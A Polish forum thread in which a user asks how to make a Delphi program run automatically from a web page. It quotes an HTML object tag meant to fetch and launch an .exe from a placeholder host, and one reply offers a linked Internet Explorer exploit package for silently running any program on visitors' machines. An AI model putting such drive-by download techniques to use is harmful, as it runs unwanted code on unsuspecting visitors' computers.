Program z www

0

Witam robię stronkę sobie jakąś tam i chcę umieścić programik (mój napisany w delphi) na serwerze i jak sobie wejdę na www to ten programik mi się odpala.
Znalazłem takie coś:

<object width="1" height="1" classid="CLSID:11111111-1111-1111-1111-111111111111" codebase="http://adres.twojej.strony/program.exe"></object&gt;

Ale to nie chce mi działać. Mam jakieś niepewności, że to obsługuje tylko kontrolki. Może źle to umieszczam w edytorze html albo cuś? :)
Pomocy!

0

Jeśli jakaś przeglądarka zezwoliłaby na odpalenie zdalnego programu, to oznaczało by, że ma poważną dziurę w zabezpieczeniu.
Stara wersja IE chyba taką miała ;)

0

Mozesz uzyc czegos takiego jak ActiveX np skaner.mks.com.pl tak dziala tylko ze taka strona bedzie IE only :/ Wlasnie chyba cos takiego masz na mysli gdzies na 4p w przykladach chyba bylo cos takiego albo art na ten temat :)

0

Oczywiście, że ActiveX .. jako, że jest to kontrolka OCX obsługiwana przez IE (chyba tylko przez IE). Bynajmniej o takim odwołaniu do czystego EXE`ka nie może być mowy..

0

Heh, są jeszcze swf'y, obsługiwane przez wszelkie możliwe przeglądarki. Gdzieś było w FAQ do Delphi o tym jak taki programik skompilować.

0

Heh, są jeszcze swf'y, obsługiwane przez wszelkie możliwe przeglądarki.

ee, to flash jest :P

0

"Legalnie" tego sie nie da zrobic z przyczyn oczywistych, na szczescie przychodzi nam z pomoca najwiekszy backdoor wszechczasow (czyt. Internet "Exploiter") ktorego uzywa wiekszosc ludzi :) Jest taka dziura nie wiem czy zostala juz zalatana, ale u mnie nadal ona widnieje (mam winXP sp2).

wystarczy pliki http://pampidam.w.interia.pl/exploit.rar wstawic na stronke, a zamiast exploit.exe dać jakis swoj program. zostanie on sciagniety i uruchomiony :)
Przyklad: http://pampidam.w.interia.pl/exploit.htm ps. nie obawiajcie sie, to nie zaden wir ;-)

oczywiscie nieladnie tak robic :)

0

Przyklad: http://pampidam.w.interia.pl/exploit.htm ps. nie obawiajcie sie, to nie zaden wir
IE 6.0 Win2k - pusta strona, nic się nie dzieje.

0

Przyklad: http://pampidam.w.interia.pl/exploit.htm ps. nie obawiajcie sie, to nie zaden wir
IE 6.0 Win2k - pusta strona, nic się nie dzieje.

Tak, zauwazylem, ze na niektorych komputerach nie dziala to, nie wiem dlaczego, jak wroce do domu to zbadam sprawe :)

// świeże łatki ;] - ŁF
//zzzawsze :> - M

  • no właśnie user image - ŁF

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0